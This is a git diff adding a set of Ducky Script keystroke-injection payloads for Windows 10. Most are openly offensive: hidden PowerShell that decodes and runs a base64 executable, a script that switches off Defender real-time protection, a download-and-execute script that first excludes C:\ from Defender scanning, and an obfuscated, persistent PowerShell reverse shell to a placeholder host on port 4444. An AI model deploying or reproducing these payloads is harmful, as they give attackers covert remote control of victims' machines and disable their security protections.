b/Tools/Base64 Decode & Execute.txt @@ -0,0 +1,30 @@ +REM Title: Base64 Decode & Execute +REM Author: @beigeworm +REM Description: Uses Powershell to decode a Base64 string and then execute the file. +REM Target: Windows 10 + +REM *SETUP* +REM replace all placeholders throughout the script. + +REM some setup for dukie script +DEFAULT_DELAY 100 + +REM open powershell (remove -W Hidden to show the window) +GUI r +DELAY 750 +STRING powershell -NoP -NonI -W Hidden -Exec Bypass +CTRL-SHIFT ENTER +DELAY 1500 +ALT y +DELAY 5000 + +REM *replace this below* +STRING $b64 = 'YOUR_BASE64_STRING_HERE_IN_SINGLE_QUOTES'; + +STRING $decodedFile = [System.Convert]::FromBase64String($b64); + + +REM *replace NAME_HERE and desired filetype (example is .exe)* +STRING $File = "NAME_HERE"+".exe"; + +STRING Set-Content -Path $File -Value $decodedFile -Encoding Byte;& $File \ No newline at end of file diff --git a/Tools/Disable RT-Protection.txt b/Tools/Disable RT-Protection.txt new file mode 100644 index 0000000..fa8c2b4 --- /dev/null +++ b/Tools/Disable RT-Protection.txt @@ -0,0 +1,30 @@ +REM Title: Disable Real-Time Protection +REM Author: @beigeworm +REM Description: Manually opens Windows Security window and turns offf Real-Time Protection. +REM Target: Windows 10 + + +REM some setup for dukie script. +DEFAULT_DELAY 100 + +REM open Windows Security GUI. +GUI r +DELAY 1500 +STRING windowsdefender:// +ENTER +DELAY 2000 + +REM run through option list and turn RT-protection off. +ENTER +TAB +TAB +TAB +TAB +ENTER +DELAY 200 +SPACE +DELAY 300 +ALT y +DELAY 400 +ALT F4 + diff --git a/Tools/Download-Execute from Run Prompt.txt b/Tools/Download-Execute from Run Prompt.txt new file mode 100644 index 0000000..ad1d856 --- /dev/null +++ b/Tools/Download-Execute from Run Prompt.txt @@ -0,0 +1,23 @@ +REM Title: Download-Execute from Run Prompt +REM Author: @beigeworm +REM Description: Uses the Run Prompt to download a file and run it. +REM Target: Windows 10 + +REM *SETUP* +REM replace FILE_URL_HERE with the url of your file to run. + +REM some setup for dukie script. +DEFAULT_DELAY 100 + +REM open powershell (remove -W Hidden to show the window). +GUI r +DELAY 750 +STRING powershell -NoP -NonI -W Hidden -Exec Bypass -C cd $env:Temp;Add-MpPreference -ExclusionPath C:\;Start-Sleep 1; + +REM replace FILE_URL_HERE below. +STRING iwr -Uri FILE_URL_HERE -OutFile upl.exe;Start-Sleep 1;Start upl.exe;exit + +CTRL-SHIFT ENTER +DELAY 1500 +ALT y +DELAY 5000 diff --git a/Tools/Set US Keyboard & System Language.txt b/Tools/Set US Keyboard & System Language.txt new file mode 100644 index 0000000..1866494 --- /dev/null +++ b/Tools/Set US Keyboard & System Language.txt @@ -0,0 +1,30 @@ +REM Title: Set System Language +REM Author: @beigeworm +REM Description: Uses Powershell to set the Windows system lanuage (exame is UK-US). +REM Target: Windows 10 + +REM some setup for dukie script +DEFAULT_DELAY 100 + +REM open powershell (remove -W Hidden to show the window) +GUI r +DELAY 750 +STRING powershell -NoP -NonI -W Hidden -Exec Bypass +CTRL-SHIFT ENTER +DELAY 1500 +ALT y +DELAY 5000 + +REM set system language to (example here is US) +STRING Dism /online /Get-Intl +ENTER +DELAY 500 +STRING Set-WinSystemLocale en-US +ENTER +DELAY 500 +STRING Set-WinUserLanguageList en-US -force +ENTER +DELAY 500 +STRING exit +ENTER + diff --git a/Tools/Simple NetCat Client.txt b/Tools/Simple NetCat Client.txt new file mode 100644 index 0000000..d442d52 --- /dev/null +++ b/Tools/Simple NetCat Client.txt @@ -0,0 +1,28 @@ +REM Title: Simple NetCat Client +REM Author: @beigeworm +REM Description: Uses Powershell to start a Netcat client that stays open until the system is restarted. +REM Target: Windows 10 + +REM *REQUIREMENTS* +REM start a netcat listener on server machine using port 4444 (eg. nc -lvp 4444). + +REM *SETUP* +REM replace YOUR_IP_OR_DOMAIN_HERE with ncat server address. + +REM some setup for dukie script. +DEFAULT_DELAY 100 + +REM open powershell (remove -W Hidden to show the window). +GUI r +DELAY 750 +STRING powershell -NoP -NonI -W Hidden -Exec Bypass +CTRL-SHIFT ENTER +DELAY 1500 +ALT y +DELAY 5000 + +REM write out the main Powershell code. +STRING do{;$v = 4;$a = New-Object SyStem.NeT.sockeTs.TCPClieNt("YOUR_IP_OR_DOMAIN_HERE",4444) +STRING ;$b = $a.GetStream();[byte[]]$c = 0..65535|%{0};while(($d = $b.Read($c, 0, $c.Length)) -ne 0){;$e = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($c,0, $d) +STRING ;$f = (iex $e 2>&1 | Out-String );$g = $f + (pwd).Path + '> ';$h = ([text.encoding]::ASCII).GetBytes($g);$b.Write($h,0,$h.Length);$b.Flush()};$a.Close();Sleep 10}while ($v -le 5) +ENTER \ No newline at end of file